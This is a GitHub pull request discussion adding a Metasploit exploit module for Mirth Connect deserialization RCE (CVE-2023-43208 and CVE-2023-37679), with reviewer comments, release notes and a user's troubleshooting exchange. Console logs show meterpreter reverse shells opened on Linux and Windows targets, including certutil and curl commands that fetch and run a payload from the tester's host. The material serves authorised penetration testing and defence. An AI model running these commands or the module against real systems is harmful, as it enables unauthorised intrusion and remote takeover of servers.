New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add an exploit for Mirth Connect RCE (CVE-2023-43208 and CVE-2023-37679) #18755
Add an exploit for Mirth Connect RCE (CVE-2023-43208 and CVE-2023-37679) #18755
Conversation
Tested on Linux (versions 4.1.1, 4.3.0, and 4.4.0) and Windows (version 4.4.0).
9685a54
to
9e41825
Compare
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Great module @zeroSteiner. Thanks for the nice and easy target setup instructions. One minor question about the exploit methods.
Unix Command
msf6 > use mirth_connect_cve_2023_43208
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/mirth_connect_cve_2023_43208 2023-10-25 excellent Yes Mirth Connect Deserialization RCE
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/mirth_connect_cve_2023_43208
[*] Using exploit/multi/http/mirth_connect_cve_2023_43208
msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > run
[*] Started reverse TCP handler on 192.168.1.78:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 4.4.0 is affected by CVE-2023-43208.
[*] Executing cmd/linux/http/x64/meterpreter/reverse_tcp (Unix Command)
[*] Sending stage (3045380 bytes) to 192.168.1.78
[*] Meterpreter session 1 opened (192.168.1.78:4444 -> 192.168.1.78:51774) at 2024-01-29 11:41:45 -0500
meterpreter > getuid
Server username: mirth
meterpreter > sysinfo
Computer : 172.17.0.2
OS : Ubuntu 22.04 (Linux 6.5.11-linuxkit)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
Windows Command
msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > set rhost 172.16.199.138
rhost => 172.16.199.138
msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > set rport 8449
rport => 8449
msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > set target 1
target => 1
msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
payload => cmd/windows/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > run
[*] Started reverse TCP handler on 192.168.1.78:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 4.4.0 is affected by CVE-2023-43208.
[*] Executing cmd/windows/http/x64/meterpreter/reverse_tcp (Windows Command)
[*] Sending stage (201798 bytes) to 192.168.1.78
[*] Meterpreter session 2 opened (192.168.1.78:4444 -> 192.168.1.78:54437) at 2024-01-29 13:16:01 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : MSFDEVICE
OS : Windows 11 (10.0 Build 22621).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
{ | ||
'Platform' => 'win', | ||
'Arch' => ARCH_CMD, | ||
'Payload' => { 'Space' => 8191, 'DisableNops' => true } |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I was wondering where the 8191 was coming from and after reading the definition below it made me realize I've likely written a number of modules that were subject to this limitation but did not include it. Good to know.
Command prompt (Cmd. exe) command-line string limitation
In Command Prompt, the total length of the following command line can't contain more than 8191 characters
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Just one nitpick about updating the docs after the most recent change.
Retested, everything is working as expected - I think this is ready to land 👍
Windows Command
msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > set verbose true
verbose => true
msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > run
[*] Command to run on remote host: certutil -urlcache -f http://192.168.1.78:8080/SSCwCwV_75HP-noz9RKoGA %TEMP%\klTioAXB.exe & start /B %TEMP%\klTioAXB.exe
[*] Fetch Handler listening on 192.168.1.78:8080
[*] HTTP server started
[*] Adding resource /SSCwCwV_75HP-noz9RKoGA
[*] Started reverse TCP handler on 192.168.1.78:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected target version: 4.4.0
[+] The target appears to be vulnerable. Version 4.4.0 is affected by CVE-2023-43208.
[*] Executing cmd/windows/http/x64/meterpreter/reverse_tcp (Windows Command)
[+] The target appears to have executed the payload.
[*] Client 192.168.1.78 requested /SSCwCwV_75HP-noz9RKoGA
[*] Sending payload to 192.168.1.78 (Microsoft-CryptoAPI/10.0)
[*] Client 192.168.1.78 requested /SSCwCwV_75HP-noz9RKoGA
[*] Sending payload to 192.168.1.78 (CertUtil URL Agent)
[*] Sending stage (201798 bytes) to 192.168.1.78
[*] Meterpreter session 5 opened (192.168.1.78:4444 -> 192.168.1.78:55931) at 2024-01-29 14:05:16 -0500
meterpreter > exit
[*] Shutting down session: 5
Unix Command
msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > run
[*] Command to run on remote host: curl -so ./oYSMVSXND http://192.168.1.78:8080/z3OF01M3YP0rzw1UQ9fhzA; chmod +x ./oYSMVSXND; ./oYSMVSXND &
[*] Fetch Handler listening on 192.168.1.78:8080
[*] HTTP server started
[*] Adding resource /z3OF01M3YP0rzw1UQ9fhzA
[*] Started reverse TCP handler on 192.168.1.78:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected target version: 4.4.0
[+] The target appears to be vulnerable. Version 4.4.0 is affected by CVE-2023-43208.
[*] Executing cmd/linux/http/x64/meterpreter/reverse_tcp (Unix Command)
[+] The target appears to have executed the payload.
[*] Client 192.168.1.78 requested /z3OF01M3YP0rzw1UQ9fhzA
[*] Sending payload to 192.168.1.78 (curl/7.81.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.1.78
[*] Meterpreter session 6 opened (192.168.1.78:4444 -> 192.168.1.78:55963) at 2024-01-29 14:07:49 -0500
meterpreter > getuid
Server username: mirth
meterpreter > sysinfo
Computer : 172.17.0.2
OS : Ubuntu 22.04 (Linux 6.5.11-linuxkit)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
[*] Running automatic check ("set AutoCheck false" to disable) | ||
[*] Detected target version: 4.1.1 | ||
[+] The target appears to be vulnerable. Version 4.1.1 is affected by CVE-2023-37679. | ||
[*] Executing cmd/linux/http/x64/meterpreter/reverse_tcp (Unix Command) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
[*] Executing cmd/linux/http/x64/meterpreter/reverse_tcp (Unix Command) | |
[*] Executing cmd/linux/http/x64/meterpreter/reverse_tcp (Unix Command) | |
[+] The target appears to have executed the payload. |
[*] Running automatic check ("set AutoCheck false" to disable) | ||
[*] Detected target version: 4.4.0 | ||
[+] The target appears to be vulnerable. Version 4.4.0 is affected by CVE-2023-43208. | ||
[*] Executing cmd/windows/powershell/x64/meterpreter/reverse_tcp (Windows Command) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
[*] Executing cmd/windows/powershell/x64/meterpreter/reverse_tcp (Windows Command) | |
[*] Executing cmd/windows/powershell/x64/meterpreter/reverse_tcp (Windows Command) | |
[+] The target appears to have executed the payload. |
4e97f1e
to
577898d
Compare
Release NotesThis PR adds an exploit module for Mirth Connect. Versions < 4.4.1 are vulnerable to CVE-2023-43208 and CVE-2023-37679 and where the former is a patch bypass for the later. In both cases, an attacker can execute an OS command in the context of the target service using a specially crafted HTTP request and Java deserialization gadget. |
I have tried the exploit on a target Linux system but am getting no session created: I have checked firewall rules and everything, any idea what I maybe doing wrong and why there is no session being created?
|
Try using a different |
@zeroSteiner It worked thanks! |
Mirth Connect versions < 4.4.1 are vulnerable to CVE-2023-43208 and CVE-2023-37679 where the former is a patch bypass for the later. In both cases, an attacker can execute an OS command in the context of the target service using a specially crafted HTTP request and Java deserialization gadget.
Verification
List the steps needed to make sure this thing works
use exploit/multi/http/mirth_connect_cve_2023_43208
RHOSTS
,PAYLOAD
and payload-related optionsDemo (Windows)